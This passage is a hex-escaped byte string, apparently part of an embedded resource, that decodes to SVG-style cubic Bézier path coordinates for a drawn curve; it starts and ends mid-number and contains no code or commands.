\x36\x30\x33\x37\x32\x39\x37\x32\x20\x31\x34\x2e\x33\x30\x30\x33\
\x35\x39\x30\x37\x20\x31\x30\x2e\x31\x37\x32\x39\x33\x36\x34\x36\
\x35\x35\x20\x43\x20\x31\x34\x2e\x33\x30\x36\x36\x30\x30\x31\x33\
\x38\x38\x20\x31\x30\x2e\x31\x33\x39\x38\x33\x35\x36\x33\x33\x38\
\x20\x31\x34\x2e\x33\x31\x32\x38\x34\x31\x32\x30\x37\x37\x20\x31\
\x30\x2e\x31\x30\x37\x32\x34\x36\x31\x36\x33\x37\x20\x31\x34\x2e\
\x33\x31\x39\x30\x38\x32\x32\x37\x36\x35\x20\x31\x30\x2e\x30\x37\
\x35\x31\x39\x30\x31\x30\x37\x38\x20\x43\x20\x31\x34\x2e\x33\x32\
\x35\x33\x32\x33\x33\x34\x35\x33\x20\x31\x30\x2e\x30\x34\x33\x31\
\x33\x34\x30\x35\x31\x38\x20\x31\x34\x2e\x33\x33\x31\x35\x36\x34\
\x34\x31\x34\x32\x20\x31\x30\x2e\x30\x31\x31\x36\x31\x34\x36\x32\
\x31\x32\x20\x31\x34\x2e\x33\x33\x37\x38\x30\x35\x34\x38\x33\x20\
\x39\x2e\x39\x38\x30\x36\x35\x32\x38\x39\x32\x38\x37\x20\x43\x20\
\x31\x34\x2e\x33\x34\x34\x30\x34\x36\x35\x35\x31\x38\x20\x39\x2e\
\x39\x34\x39\x36\x39\x31\x31\x36\x34\x35\x35\x20\x31\x34\x2e\x33\
\x35\x30\x32\x38\x37\x36\x32\x30\x37\x20\x39\x2e\x39\x31\x39\x32\
\x39\x30\x34\x39\x35\x37\x39\x20\x31\x34\x2e\x33\x35\x36\x35\x32\
\x38\x36\x38\x39\x35\x20\x39\x2e\x38\x38\x39\x34\x37\x30\x39\x35\
\x35\x34\x20\x43\x20\x31\x34\x2e\x33\x36\x32\x37\x36\x39\x37\x35\
\x38\x33\x20\x39\x2e\x38\x35\x39\x36\x35\x31\x34\x31\x35\x30\x32\
\x20\x31\x34\x2e\x33\x36\x39\x30\x31\x30\x38\x32\x37\x32\x20\x39\
\x2e\x38\x33\x30\x34\x31\x36\x35\x30\x31\x31\x32\x20\x31\x34\x2e\
\x33\x37\x35\x32\x35\x31\x38\x39\x36\x20\x39\x2e\x38\x30\x31\x37\
\x38\x35\x32\x34\x33\x33\x39\x20\x43\x20\x31\x34\x2e\x33\x38\x31\
\x34\x39\x32\x39\x36\x34\x39\x20\x39\x2e\x37\x37\x33\x31\x35\x33\
\x39\x38\x35\x36\x36\x20\x31\x34\x2e\x33\x38\x37\x37\x33\x34\x30\
\x33\x33\x37\x20\x39\x2e\x37\x34\x35\x31\x33\x30\x30\x31\x37\x36\
\x35\x20\x31\x34\x2e\x33\x39\x33\x39\x37\x35\x31\x30\x32\x35\x20\
\x39\x2e\x37\x31\x37\x37\x33\x31\x33\x30\x30\x34\x36\x20\x43\x20\
\x31\x34\x2e\x34\x30\x30\x32\x31\x36\x31\x37\x31\x34\x20\x39\x2e\
\x36\x39\x30\x33\x33\x32\x35\x38\x33\x32\x38\x20\x31\x34\x2e\x34\
\x30\x36\x34\x35\x37\x32\x34\x30\x32\x20\x39\x2e\x36\x36\x33\x35\
\x36\x32\x38\x38\x30\x32\x38\x20\x31\x34\x2e\x34\x31\x32\x36\x39\
\x38\x33\x30\x39\x20\x39\x2e\x36\x33\x37\x34\x33\x39\x30\x35\x36\
\x32\x38\x20\x43\x20\x31\x34\x2e\x34\x31\x38\x39\x33\x39\x33\x37\
\x37\x39\x20\x39\x2e\x36\x31\x31\x33\x31\x35\x32\x33\x32\x32\x38\
\x20\x31\x34\x2e\x34\x32\x35\x31\x38\x30\x34\x34\x36\x37\x20\x39\
\x2e\x35\x38\x35\x38\x34\x31\x31\x37\x34\x36\x32\x20\x31\x34\x2e\
\x34\x33\x31\x34\x32\x31\x35\x31\x35\x35\x20\x39\x2e\x35\x36\x31\
\x30\x33\x32\x36\x32\x35\x37\x32\x20\x43\x20\x31\x34\x2e\x34\x33\
\x37\x36\x36\x32\x35\x38\x34\x34\x20\x39\x2e\x35\x33\x36\x32\x32\
\x34\x30\x37\x36\x38\x32\x20\x31\x34\x2e\x34\x34\x33\x39\x30\x33\
\x36\x35\x33\x32\x20\x39\x2e\x35\x31\x32\x30\x38\x35\x30\x34\x32\
\x30\x32\x20\x31\x34\x2e\x34\x35\x30\x31\x34\x34\x37\x32\x32\x31\
\x20\x39\x2e\x34\x38\x38\x36\x33\x30\x31\x31\x37\x30\x31\x20\x43\
\x20\x31\x34\x2e\x34\x35\x36\x33\x38\x35\x37\x39\x30\x39\x20\x39\
\x2e\x34\x36\x35\x31\x37\x35\x31\x39\x31\x39\x39\x20\x31\x34\x2e\
\x34\x36\x32\x36\x32\x36\x38\x35\x39\x37\x20\x39\x2e\x34\x34\x32\
\x34\x30\x38\x34\x39\x33\x39\x31\x20\x31\x34\x2e\x34\x36\x38\x38\
\x36\x37\x39\x32\x38\x36\x20\x39\x2e\x34\x32\x30\x33\x34\x33\x34\
\x34\x39\x31\x35\x20\x43\x20\x31\x34\x2e\x34\x37\x35\x31\x30\x38\
\x39\x39\x37\x34\x20\x39\x2e\x33\x39\x38\x32\x37\x38\x34\x30\x34\
\x33\x39\x20\x31\x34\x2e\x34\x38\x31\x33\x35\x30\x30\x36\x36\x32\
\x20\x39\x2e\x33\x37\x36\x39\x31\x39\x32\x33\x35\x35\x33\x20\x31\
\x34\x2e\x34\x38\x37\x35\x39\x31\x31\x33\x35\x31\x20\x39\x2e\x33\
\x35\x36\x32\x37\x38\x31\x37\x38\x39\x33\x20\x43\x20\x31\x34\x2e\
\x34\x39\x33\x38\x33\x32\x32\x30\x33\x39\x20\x39\x2e\x33\x33\x35\
\x36\x33\x37\x31\x32\x32\x33\x33\x20\x31\x34\x2e\x35\x30\x30\x30\
\x37\x33\x32\x37\x32\x37\x20\x39\x2e\x33\x31\x35\x37\x31\x38\x34\
\x39\x39\x34\x37\x20\x31\x34\x2e\x35\x30\x36\x33\x31\x34\x33\x34\
\x31\x36\x20\x39\x2e\x32\x39\x36\x35\x33\x33\x33\x33\x37\x37\x35\
\x20\x43\x20\x31\x34\x2e\x35\x31\x32\x35\x35\x35\x34\x31\x30\x34\
\x20\x39\x2e\x32\x37\x37\x33\x34\x38\x31\x37\x36\x30\x32\x20\x31\
\x34\x2e\x35\x31\x38\x37\x39\x36\x34\x37\x39\x32\x20\x39\x2e\x32\
\x35\x38\x39\x30\x30\x38\x38\x39\x31\x35\x20\x31\x34\x2e\x35\x32\
\x35\x30\x33\x37\x35\x34\x38\x31\x20\x39\x2e\x32\x34\x31\x32\x30\
\x31\x32\x37\x38\x35\x32\x20\x43\x20\x31\x34\x2e\x35\x33\x31\x32\
\x37\x38\x36\x31\x36\x39\x20\x39\x2e\x32\x32\x33\x35\x30\x31\x36\
\x36\x37\x38\x39\x20\x31\x34\x2e\x35\x33\x37\x35\x31\x39\x36\x38\
\x35\x38\x20\x39\x2e\x32\x30\x36\x35\x35\x34\x32\x33\x32\x36\x32\
\x20\x31\x34\x2e\x35\x34\x33\x37\x36\x30\x37\x35\x34\x36\x20\x39\
\x2e\x31\x39\x30\x33\x36\x37\x35\x33\x32\x39\x35\x20\x43\x20\x31\
\x34\x2e\x35\x35\x30\x30\x30\x31\x38\x32\x33\x34\x20\x39\x2e\x31\
\x37\x34\x31\x38\x30\x38\x33\x33\x32\x38\x20\x31\x34\x2e\x35\x35\
\x36\x32\x34\x32\x38\x39\x32\x33\x20\x39\x2e\x31\x35\x38\x37\x35\
\x39\x34\x34\x36\x37\x37\x20\x31\x34\x2e\x35\x36\x32\x34\x38\x33\
\x39\x36\x31\x31\x20\x39\x2e\x31\x34\x34\x31\x31\x30\x36\x37\x39\
\x32\x38\x20\x43\x20\x31\x34\x2e\x35\x36\x38\x37\x32\x35\x30\x32\
\x39\x39\x20\x39\x2e\x31\x32\x39\x34\x36\x31\x39\x31\x31\x37\x38\
\x20\x31\x34\x2e\x35\x37\x34\x39\x36\x36\x30\x39\x38\x38\x20\x39\
\x2e\x31\x31\x35\x35\x39\x30\x34\x31\x32\x32\x35\x20\x31\x34\x2e\
\x35\x38\x31\x32\x30\x37\x31\x36\x37\x36\x20\x39\x2e\x31\x30\x32\
\x35\x30\x32\x32\x32\x30\x38\x34\x20\x43\x20\x31\x34\x2e\x35\x38\
\x37\x34\x34\x38\x32\x33\x36\x34\x20\x39\x2e\x30\x38\x39\x34\x31\
\x34\x30\x32\x39\x34\x34\x20\x31\x34\x2e\x35\x39\x33\x36\x38\x39\
\x33\x30\x35\x33\x20\x39\x2e\x30\x37\x37\x31\x31\x33\x38\x35\x39\
\x32\x39\x20\x31\x34\x2e\x35\x39\x39\x39\x33\x30\x33\x37\x34\x31\
\x20\x39\x2e\x30\x36\x35\x36\x30\x36\x34\x37\x35\x35\x35\x20\x43\
\x20\x31\x34\x2e\x36\x30\x36\x31\x37\x31\x34\x34\x33\x20\x39\x2e\
\x30\x35\x34\x30\x39\x39\x30\x39\x31\x38\x31\x20\x31\x34\x2e\x36\
\x31\x32\x34\x31\x32\x35\x31\x31\x38\x20\x39\x2e\x30\x34\x33\x33\
\x38\x39\x32\x36\x34\x35\x32\x20\x31\x34\x2e\x36\x31\x38\x36\x35\
\x33\x35\x38\x30\x36\x20\x39\x2e\x30\x33\x33\x34\x38\x30\x34\x37\
\x36\x34\x34\x20\x43\x20\x31\x34\x2e\x36\x32\x34\x38\x39\x34\x36\
\x34\x39\x35\x20\x39\x2e\x30\x32\x33\x35\x37\x31\x36\x38\x38\x33\
\x35\x20\x31\x34\x2e\x36\x33\x31\x31\x33\x35\x37\x31\x38\x33\x20\
\x39\x2e\x30\x31\x34\x34\x36\x38\x37\x35\x39\x30\x35\x20\x31\x34\
\x2e\x36\x33\x37\x33\x37\x36\x37\x38\x37\x31\x20\x39\x2e\x30\x30\
\x36\x31\x37\x33\x38\x38\x33\x35\x32\x20\x43\x20\x31\x34\x2e\x36\
\x34\x33\x36\x31\x37\x38\x35\x36\x20\x38\x2e\x39\x39\x37\x38\x37\
\x39\x30\x30\x37\x39\x39\x20\x31\x34\x2e\x36\x34\x39\x38\x35\x38\
\x39\x32\x34\x38\x20\x38\x2e\x39\x39\x30\x33\x39\x37\x30\x34\x37\
\x38\x38\x20\x31\x34\x2e\x36\x35\x36\x30\x39\x39\x39\x39\x33\x36\
\x20\x38\x2e\x39\x38\x33\x37\x32\x38\x39\x30\x37\x30\x34\x20\x43\
\x20\x31\x34\x2e\x36\x36\x32\x33\x34\x31\x30\x36\x32\x35\x20\x38\
\x2e\x39\x37\x37\x30\x36\x30\x37\x36\x36\x31\x39\x20\x31\x34\x2e\
\x36\x36\x38\x35\x38\x32\x31\x33\x31\x33\x20\x38\x2e\x39\x37\x31\
\x32\x31\x31\x33\x34\x30\x38\x31\x20\x31\x34\x2e\x36\x37\x34\x38\
\x32\x33\x32\x30\x30\x32\x20\x38\x2e\x39\x36\x36\x31\x38\x30\x32\
\x34\x32\x31\x39\x20\x43\x20\x31\x34\x2e\x36\x38\x31\x30\x36\x34\
\x32\x36\x39\x20\x38\x2e\x39\x36\x31\x31\x34\x39\x31\x34\x33\x35\
\x36\x20\x31\x34\x2e\x36\x38\x37\x33\x30\x35\x33\x33\x37\x38\x20\
\x38\x2e\x39\x35\x36\x39\x34\x31\x32\x39\x34\x38\x39\x20\x31\x34\
\x2e\x36\x39\x33\x35\x34\x36\x34\x30\x36\x37\x20\x38\x2e\x39\x35\
\x33\x35\x35\x35\x30\x31\x35\x35\x20\x43\x20\x31\x34\x2e\x36\x39\
\x39\x37\x38\x37\x34\x37\x35\x35\x20\x38\x2e\x39\x35\x30\x31\x36\
\x38\x37\x33\x36\x31\x31\x20\x31\x34\x2e\x37\x30\x36\x30\x32\x38\
\x35\x34\x34\x33\x20\x38\x2e\x39\x34\x37\x36\x30\x38\x39\x36\x38\
\x36\x20\x31\x34\x2e\x37\x31\x32\x32\x36\x39\x36\x31\x33\x32\x20\
\x38\x2e\x39\x34\x35\x38\x37\x32\x37\x34\x32\x39\x32\x20\x43\x20\
\x31\x34\x2e\x37\x31\x38\x35\x31\x30\x36\x38\x32\x20\x38\x2e\x39\
\x34\x34\x31\x33\x36\x35\x31\x37\x32\x34\x20\x31\x34\x2e\x37\x32\
\x34\x37\x35\x31\x37\x35\x30\x38\x20\x38\x2e\x39\x34\x33\x32\x32\
\x38\x37\x38\x37\x37\x34\x20\x31\x34\x2e\x37\x33\x30\x39\x39\x32\
\x38\x31\x39\x37\x20\x38\x2e\x39\x34\x33\x31\x34\x35\x32\x39\x39\
\x36\x32\x20\x43\x20\x31\x34\x2e\x37\x33\x37\x32\x33\x33\x38\x38\
\x38\x35\x20\x38\x2e\x39\x34\x33\x30\x36\x31\x38\x31\x31\x34\x39\
\x20\x31\x34\x2e\x37\x34\x33\x34\x37\x34\x39\x35\x37\x33\x20\x38\
\x2e\x39\x34\x33\x38\x30\x37\x35\x32\x33\x31\x36\x20\x31\x34\x2e\
\x37\x34\x39\x37\x31\x36\x30\x32\x36\x32\x20\x38\x2e\x39\x34\x35\
\x33\x37\x36\x39\x30\x31\x36\x34\x20\x43\x20\x31\x34\x2e\x37\x35\
\x35\x39\x35\x37\x30\x39\x35\x20\x38\x2e\x39\x34\x36\x39\x34\x36\
\x32\x38\x30\x31\x32\x20\x31\x34\x2e\x37\x36\x32\x31\x39\x38\x31\
\x36\x33\x39\x20\x38\x2e\x39\x34\x39\x33\x34\x34\x32\x38\x30\x32\
\x35\x20\x31\x34\x2e\x37\x36\x38\x34\x33\x39\x32\x33\x32\x37\x20\
\x38\x2e\x39\x35\x32\x35\x36\x34\x30\x39\x39\x34\x31\x20\x43\x20\
\x31\x34\x2e\x37\x37\x34\x36\x38\x30\x33\x30\x31\x35\x20\x38\x2e\
\x39\x35\x35\x37\x38\x33\x39\x31\x38\x35\x36\x20\x31\x34\x2e\x37\
\x38\x30\x39\x32\x31\x33\x37\x30\x34\x20\x38\x2e\x39\x35\x39\x38\
\x33\x30\x35\x30\x30\x33\x35\x20\x31\x34\x2e\x37\x38\x37\x31\x36\
\x32\x34\x33\x39\x32\x20\x38\x2e\x39\x36\x34\x36\x39\x35\x37\x38\
\x33\x30\x32\x20\x43\x20\x31\x34\x2e\x37\x39\x33\x34\x30\x33\x35\
\x30\x38\x20\x38\x2e\x39\x36\x39\x35\x36\x31\x30\x36\x35\x37\x20\
\x31\x34\x2e\x37\x39\x39\x36\x34\x34\x35\x37\x36\x39\x20\x38\x2e\
\x39\x37\x35\x32\x34\x39\x39\x37\x33\x39\x38\x20\x31\x34\x2e\x38\
\x30\x35\x38\x38\x35\x36\x34\x35\x37\x20\x38\x2e\x39\x38\x31\x37\
\x35\x33\x31\x39\x39\x34\x37\x20\x43\x20\x31\x34\x2e\x38\x31\x32\
\x31\x32\x36\x37\x31\x34\x35\x20\x38\x2e\x39\x38\x38\x32\x35\x36\
\x34\x32\x34\x39\x35\x20\x31\x34\x2e\x38\x31\x38\x33\x36\x37\x37\
\x38\x33\x34\x20\x38\x2e\x39\x39\x35\x35\x37\x38\x38\x36\x35\x38\
\x38\x20\x31\x34\x2e\x38\x32\x34\x36\x30\x38\x38\x35\x32\x32\x20\
\x39\x2e\x30\x30\x33\x37\x30\x39\x39\x38\x31\x35\x37\x20\x43\x20\
\x31\x34\x2e\x38\x33\x30\x38\x34\x39\x39\x32\x31\x31\x20\x39\x2e\
\x30\x31\x31\x38\x34\x31\x30\x39\x37\x32\x36\x20\x31\x34\x2e\x38\
\x33\x37\x30\x39\x30\x39\x38\x39\x39\x20\x39\x2e\x30\x32\x30\x37\
\x38\x35\x37\x35\x31\x38\x38\x20\x31\x34\x2e\x38\x34\x33\x33\x33\
\x32\x30\x35\x38\x37\x20\x39\x2e\x30\x33\x30\x35\x33\x32\x31\x38\
\x38\x37\x38\x20\x43\x20\x31\x34\x2e\x38\x34\x39\x35\x37\x33\x31\
\x32\x37\x36\x20\x39\x2e\x30\x34\x30\x32\x37\x38\x36\x32\x35\x36\
\x38\x20\x31\x34\x2e\x38\x35\x35\x38\x31\x34\x31\x39\x36\x34\x20\
\x39\x2e\x30\x35\x30\x38\x33\x31\x36\x36\x37\x34\x34\x20\x31\x34\
\x2e\x38\x36\x32\x30\x35\x35\x32\x36\x35\x32\x20\x39\x2e\x30\x36\
\x32\x31\x37\x38\x33\x35\x39\x36\x31\x20\x43\x20\x31\x34\x2e\x38\
\x36\x38\x32\x39\x36\x33\x33\x34\x31\x20\x39\x2e\x30\x37\x33\x35\
\x32\x35\x30\x35\x31\x37\x39\x20\x31\x34\x2e\x38\x37\x34\x35\x33\
\x37\x34\x30\x32\x39\x20\x39\x2e\x30\x38\x35\x36\x37\x30\x31\x36\
\x37\x39\x32\x20\x31\x34\x2e\x38\x38\x30\x37\x37\x38\x34\x37\x31\
\x37\x20\x39\x2e\x30\x39\x38\x35\x39\x39\x35\x37\x35\x37\x37\x20\
\x43\x20\x31\x34\x2e\x38\x38\x37\x30\x31\x39\x35\x34\x30\x36\x20\
\x39\x2e\x31\x31\x31\x35\x32\x38\x39\x38\x33\x36\x33\x20\x31\x34\
\x2e\x38\x39\x33\x32\x36\x30\x36\x30\x39\x34\x20\x39\x2e\x31\x32\
\x35\x32\x34\x37\x34\x30\x30\x33\x34\x20\x31\x34\x2e\x38\x39\x39\
\x35\x30\x31\x36\x37\x38\x32\x20\x39\x2e\x31\x33\x39\x37\x33\x39\
\x35\x33\x37\x37\x34\x20\x43\x20\x31\x34\x2e\x39\x30\x35\x37\x34\
\x32\x37\x34\x37\x31\x20\x39\x2e\x31\x35\x34\x32\x33\x31\x36\x37\
\x35\x31\x34\x20\x31\x34\x2e\x39\x31\x31\x39\x38\x33\x38\x31\x35\
\x39\x20\x39\x2e\x31\x36\x39\x35\x30\x32\x31\x38\x36\x36\x35\x20\
\x31\x34\x2e\x39\x31\x38\x32\x32\x34\x38\x38\x34\x38\x20\x39\x2e\
\x31\x38\x35\x35\x33\x34\x36\x35\x31\x38\x31\x20\x43\x20\x31\x34\
\x2e\x39\x32\x34\x34\x36\x35\x39\x35\x33\x36\x20\x39\x2e\x32\x30\
\x31\x35\x36\x37\x31\x31\x36\x39\x37\x20\x31\x34\x2e\x39\x33\x30\
\x37\x30\x37\x30\x32\x32\x34\x20\x39\x2e\x32\x31\x38\x33\x36\x36\
\x31\x31\x38\x32\x39\x20\x31\x34\x2e\x39\x33\x36\x39\x34\x38\x30\
\x39\x31\x33\x20\x39\x2e\x32\x33\x35\x39\x31\x34\x31\x32\x38\x33\
\x39\x20\x43\x20\x31\x34\x2e\x39\x34\x33\x31\x38\x39\x31\x36\x30\
\x31\x20\x39\x2e\x32\x35\x33\x34\x36\x32\x31\x33\x38\x35\x20\x31\
\x34\x2e\x39\x34\x39\x34\x33\x30\x32\x32\x38\x39\x20\x39\x2e\x32\
\x37\x31\x37\x36\x33\x36\x36\x31\x39\x32\x20\x31\x34\x2e\x39\x35\
\x35\x36\x37\x31\x32\x39\x37\x38\x20\x39\x2e\x32\x39\x30\x38\x30\
\x30\x30\x39\x31\x34\x35\x20\x43\x20\x31\x34\x2e\x39\x36\x31\x39\
\x31\x32\x33\x36\x36\x36\x20\x39\x2e\x33\x30\x39\x38\x33\x36\x35\
\x32\x30\x39\x38\x20\x31\x34\x2e\x39\x36\x38\x31\x35\x33\x34\x33\
\x35\x34\x20\x39\x2e\x33\x32\x39\x36\x31\x32\x32\x37\x36\x32\x20\
\x31\x34\x2e\x39\x37\x34\x33\x39\x34\x35\x30\x34\x33\x20\x39\x2e\
\x33\x35\x30\x31\x30\x37\x36\x39\x38\x38\x35\x20\x43\x20\x31\x34\
\x2e\x39\x38\x30\x36\x33\x35\x35\x37\x33\x31\x20\x39\x2e\x33\x37\
\x30\x36\x30\x33\x31\x32\x31\x35\x20\x31\x34\x2e\x39\x38\x36\x38\
\x37\x36\x36\x34\x32\x20\x39\x2e\x33\x39\x31\x38\x32\x32\x35\x33\
\x39\x33\x38\x20\x31\x34\x2e\x39\x39\x33\x31\x31\x37\x37\x31\x30\
\x38\x20\x39\x2e\x34\x31\x33\x37\x34\x35\x32\x37\x33\x35\x35\x20\
\x43\x20\x31\x34\x2e\x39\x39\x39\x33\x35\x38\x37\x37\x39\x36\x20\
\x39\x2e\x34\x33\x35\x36\x36\x38\x30\x30\x37\x37\x32\x20\x31\x35\
\x2e\x30\x30\x35\x35\x39\x39\x38\x34\x38\x35\x20\x39\x2e\x34\x35\
\x38\x32\x39\x38\x32\x38\x37\x35\x31\x20\x31\x35\x2e\x30\x31\x31\
\x38\x34\x30\x39\x31\x37\x33\x20\x39\x2e\x34\x38\x31\x36\x31\x34\
\x34\x34\x35\x32\x38\x20\x43\x20\x31\x35\x2e\x30\x31\x38\x30\x38\
\x31\x39\x38\x36\x31\x20\x39\x2e\x35\x30\x34\x39\x33\x30\x36\x30\
\x33\x30\x34\x20\x31\x35\x2e\x30\x32\x34\x33\x32\x33\x30\x35\x35\
\x20\x39\x2e\x35\x32\x38\x39\x33\x36\x37\x36\x33\x31\x31\x20\x31\
\x35\x2e\x30\x33\x30\x35\x36\x34\x31\x32\x33\x38\x20\x39\x2e\x35\
\x35\x33\x36\x31\x30\x33\x30\x32\x36\x31\x20\x43\x20\x31\x35\x2e\
\x30\x33\x36\x38\x30\x35\x31\x39\x32\x36\x20\x39\x2e\x35\x37\x38\
\x32\x38\x33\x38\x34\x32\x31\x31\x20\x31\x35\x2e\x30\x34\x33\x30\
\x34\x36\x32\x36\x31\x35\x20\x39\x2e\x36\x30\x33\x36\x32\x38\x37\
\x37\x33\x39\x39\x20\x31\x35\x2e\x30\x34\x39\x32\x38\x37\x33\x33\
\x30\x33\x20\x39\x2e\x36\x32\x39\x36\x32\x31\x35\x35\x35\x31\x33\
\x20\x43\x20\x31\x35\x2e\x30\x35\x35\x35\x32\x38\x33\x39\x39\x31\
\x20\x39\x2e\x36\x35\x35\x36\x31\x34\x33\x33\x36\x32\x38\x20\x31\
\x35\x2e\x30\x36\x31\x37\x36\x39\x34\x36\x38\x20\x39\x2e\x36\x38\
\x32\x32\x35\x38\x38\x36\x32\x30\x35\x20\x31\x35\x2e\x30\x36\x38\
\x30\x31\x30\x35\x33\x36\x38\x20\x39\x2e\x37\x30\x39\x35\x33\x30\
\x37\x30\x35\x34\x38\x20\x43\x20\x31\x35\x2e\x30\x37\x34\x32\x35\
\x31\x36\x30\x35\x37\x20\x39\x2e\x37\x33\x36\x38\x30\x32\x35\x34\
\x38\x39\x32\x20\x31\x35\x2e\x30\x38\x30\x34\x39\x32\x36\x37\x34\
\x35\x20\x39\x2e\x37\x36\x34\x37\x30\x35\x34\x38\x31\x37\x37\x20\
\x31\x35\x2e\x30\x38\x36\x37\x33\x33\x37\x34\x33\x33\x20\x39\x2e\
\x37\x39\x33\x32\x31\x34\x32\x33\x30\x39\x38\x20\x43\x20\x31\x35\
\x2e\x30\x39\x32\x39\x37\x34\x38\x31\x32\x32\x20\x39\x2e\x38\x32\
\x31\x37\x32\x32\x39\x38\x30\x31\x38\x20\x31\x35\x2e\x30\x39\x39\
\x32\x31\x35\x38\x38\x31\x20\x39\x2e\x38\x35\x30\x38\x34\x31\x31\
\x38\x38\x30\x36\x20\x31\x35\x2e\x31\x30\x35\x34\x35\x36\x39\x34\
\x39\x38\x20\x39\x2e\x38\x38\x30\x35\x34\x32\x37\x37\x34\x35\x32\
\x20\x43\x20\x31\x35\x2e\x31\x31\x31\x36\x39\x38\x30\x31\x38\x37\
\x20\x39\x2e\x39\x31\x30\x32\x34\x34\x33\x36\x30\x39\x39\x20\x31\
\x35\x2e\x31\x31\x37\x39\x33\x39\x30\x38\x37\x35\x20\x39\x2e\x39\
\x34\x30\x35\x33\x32\x38\x33\x33\x32\x39\x20\x31\x35\x2e\x31\x32\
\x34\x31\x38\x30\x31\x35\x36\x33\x20\x39\x2e\x39\x37\x31\x33\x38\
\x31\x33\x34\x34\x36\x32\x20\x43\x20\x31\x35\x2e\x31\x33\x30\x34\
\x32\x31\x32\x32\x35\x32\x20\x31\x30\x2e\x30\x30\x32\x32\x32\x39\
\x38\x35\x36\x20\x31\x35\x2e\x31\x33\x36\x36\x36\x32\x32\x39\x34\
\x20\x31\x30\x2e\x30\x33\x33\x36\x34\x31\x37\x37\x33\x31\x20\x31\
\x35\x2e\x31\x34\x32\x39\x30\x33\x33\x36\x32\x39\x20\x31\x30\x2e\
\x30\x36\x35\x35\x38\x39\x35\x32\x34\x20\x43\x20\x31\x35\x2e\x31\
\x34\x39\x31\x34\x34\x34\x33\x31\x37\x20\x31\x30\x2e\x30\x39\x37\
\x35\x33\x37\x32\x37\x34\x39\x20\x31\x35\x2e\x31\x35\x35\x33\x38\
\x35\x35\x30\x30\x35\x20\x31\x30\x2e\x31\x33\x30\x30\x32\x34\x30\
\x38\x30\x37\x20\x31\x35\x2e\x31\x36\x31\x36\x32\x36\x35\x36\x39\
\x34\x20\x31\x30\x2e\x31\x36\x33\x30\x32\x31\x36\x38\x36\x37\x20\
\x43\x20\x31\x35\x2e\x31\x36\x37\x38\x36\x37\x36\x33\x38\x32\x20\
\x31\x30\x2e\x31\x39\x36\x30\x31\x39\x32\x39\x32\x37\x20\x31\x35\
\x2e\x31\x37\x34\x31\x30\x38\x37\x30\x37\x20\x31\x30\x2e\x32\x32\
\x39\x35\x33\x30\x37\x36\x39\x33\x20\x31\x35\x2e\x31\x38\x30\x33\
\x34\x39\x37\x37\x35\x39\x20\x31\x30\x2e\x32\x36\x33\x35\x32\x37\
\x32\x32\x33\x31\x20\x43\x20\x31\x35\x2e\x31\x38\x36\x35\x39\x30\
\x38\x34\x34\x37\x20\x31\x30\x2e\x32\x39\x37\x35\x32\x33\x36\x37\
\x36\x38\x20\x31\x35\x2e\x31\x39\x32\x38\x33\x31\x39\x31\x33\x35\
\x20\x31\x30\x2e\x33\x33\x32\x30\x30\x38\x30\x32\x32\x37\x20\x31\
\x35\x2e\x31\x39\x39\x30\x37\x32\x39\x38\x32\x34\x20\x31\x30\x2e\
\x33\x36\x36\x39\x35\x30\x37\x37\x32\x39\x20\x43\x20\x31\x35\x2e\
\x32\x30\x35\x33\x31\x34\x30\x35\x31\x32\x20\x31\x30\x2e\x34\x30\
\x31\x38\x39\x33\x35\x32\x33\x20\x31\x35\x2e\x32\x31\x31\x35\x35\
\x35\x31\x32\x20\x31\x30\x2e\x34\x33\x37\x32\x39\x37\x34\x33\x32\
\x36\x20\x31\x35\x2e\x32\x31\x37\x37\x39\x36\x31\x38\x38\x39\x20\
\x31\x30\x2e\x34\x37\x33\x31\x33\x32\x34\x36\x35\x20\x43\x20\x31\
\x35\x2e\x32\x32\x34\x30\x33\x37\x32\x35\x37\x37\x20\x31\x30\x2e\
\x35\x30\x38\x39\x36\x37\x34\x39\x37\x35\x20\x31\x35\x2e\x32\x33\
\x30\x32\x37\x38\x33\x32\x36\x36\x20\x31\x30\x2e\x35\x34\x35\x32\
\x33\x36\x32\x34\x33\x37\x20\x31\x35\x2e\x32\x33\x36\x35\x31\x39\
\x33\x39\x35\x34\x20\x31\x30\x2e\x35\x38\x31\x39\x30\x38\x31\x36\
\x35\x31\x20\x43\x20\x31\x35\x2e\x32\x34\x32\x37\x36\x30\x34\x36\
\x34\x32\x20\x31\x30\x2e\x36\x31\x38\x35\x38\x30\x30\x38\x36\x34\
\x20\x31\x35\x2e\x32\x34\x39\x30\x30\x31\x35\x33\x33\x31\x20\x31\
\x30\x2e\x36\x35\x35\x36\x35\x37\x36\x30\x35\x35\x20\x31\x35\x2e\
\x32\x35\x35\x32\x34\x32\x36\x30\x31\x39\x20\x31\x30\x2e\x36\x39\
\x33\x31\x30\x39\x37\x32\x38\x37\x20\x43\x20\x31\x35\x2e\x32\x36\
\x31\x34\x38\x33\x36\x37\x30\x37\x20\x31\x30\x2e\x37\x33\x30\x35\
\x36\x31\x38\x35\x31\x39\x20\x31\x35\x2e\x32\x36\x37\x37\x32\x34\
\x37\x33\x39\x36\x20\x31\x30\x2e\x37\x36\x38\x33\x39\x30\x38\x32\
\x39\x38\x20\x31\x35\x2e\x32\x37\x33\x39\x36\x35\x38\x30\x38\x34\
\x20\x31\x30\x2e\x38\x30\x36\x35\x36\x35\x32\x36\x31\x37\x20\x43\
\x20\x31\x35\x2e\x32\x38\x30\x32\x30\x36\x38\x37\x37\x32\x20\x31\
\x30\x2e\x38\x34\x34\x37\x33\x39\x36\x39\x33\x36\x20\x31\x35\x2e\
\x32\x38\x36\x34\x34\x37\x39\x34\x36\x31\x20\x31\x30\x2e\x38\x38\
\x33\x32\x36\x31\x36\x35\x34\x38\x20\x31\x35\x2e\x32\x39\x32\x36\
\x38\x39\x30\x31\x34\x39\x20\x31\x30\x2e\x39\x32\x32\x30\x39\x39\
\x33\x38\x35\x39\x20\x43\x20\x31\x35\x2e\x32\x39\x38\x39\x33\x30\
\x30\x38\x33\x38\x20\x31\x30\x2e\x39\x36\x30\x39\x33\x37\x31\x31\
\x36\x39\x20\x31\x35\x2e\x33\x30\x35\x31\x37\x31\x31\x35\x32\x36\
\x20\x31\x31\x2e\x30\x30\x30\x30\x39\x32\x35\x31\x34\x35\x20\x31\
\x35\x2e\x33\x31\x31\x34\x31\x32\x32\x32\x31\x34\x20\x31\x31\x2e\
\x30\x33\x39\x35\x33\x33\x35\x30\x39\x37\x20\x43\x20\x31\x35\x2e\
\x33\x31\x37\x36\x35\x33\x32\x39\x30\x33\x20\x31\x31\x2e\x30\x37\
\x38\x39\x37\x34\x35\x30\x35\x20\x31\x35\x2e\x33\x32\x33\x38\x39\
